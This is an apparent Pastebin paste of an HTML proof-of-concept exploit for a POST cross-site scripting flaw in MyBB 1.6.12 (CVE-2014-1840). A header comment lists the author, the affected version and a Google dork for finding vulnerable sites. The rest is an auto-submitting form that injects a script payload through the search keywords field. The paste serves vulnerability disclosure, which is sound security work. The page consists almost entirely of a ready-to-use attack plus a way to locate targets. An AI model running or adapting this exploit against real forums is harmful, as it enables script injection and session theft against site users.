Advertisement
InfinityExistz

Zerosecurity.org - MYBB Zero-day

Feb 4th, 2014
872
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.88 KB | None | 0 0
  1. <html>
  2. <!--
  3. Exploit-Title: MyBB 1.6.12 POST XSS 0day
  4. Google-Dork: inurl:index.php intext:Powered By MyBB
  5. Date: Februrary 2nd of 2014
  6. Bug Discovered and Exploit Author: Osanda Malith Jayathissa
  7. Vendor Homepage: http://www.mybb.com
  8. Software Link: http://resources.mybb.com/downloads/mybb_1612.zip
  9. Version: 1.6.12 (older versions might be vulnerbale)
  10. Tested on: Windows 8 64-bit
  11. Video: https://www.youtube.com/watch?v=67MfgixmWgo
  12. Original write-up: http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day
  13. CVE: CVE-2014-1840
  14. -->
  15.   <body>
  16.     <form name="exploit" action="http://localhost/mybb_1612/Upload/search.php" method="POST">
  17.       <input type="hidden" name="action" value="do_search" />
  18.       <input type="hidden" name="keywords"
  19.  
  20. value="qor'("\2a<script>alert(/XSS/)</script>
  21.  
  22. " />
  23.     <script>document.exploit.submit(); </script>
  24.     </form>
  25.   </body>
  26. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement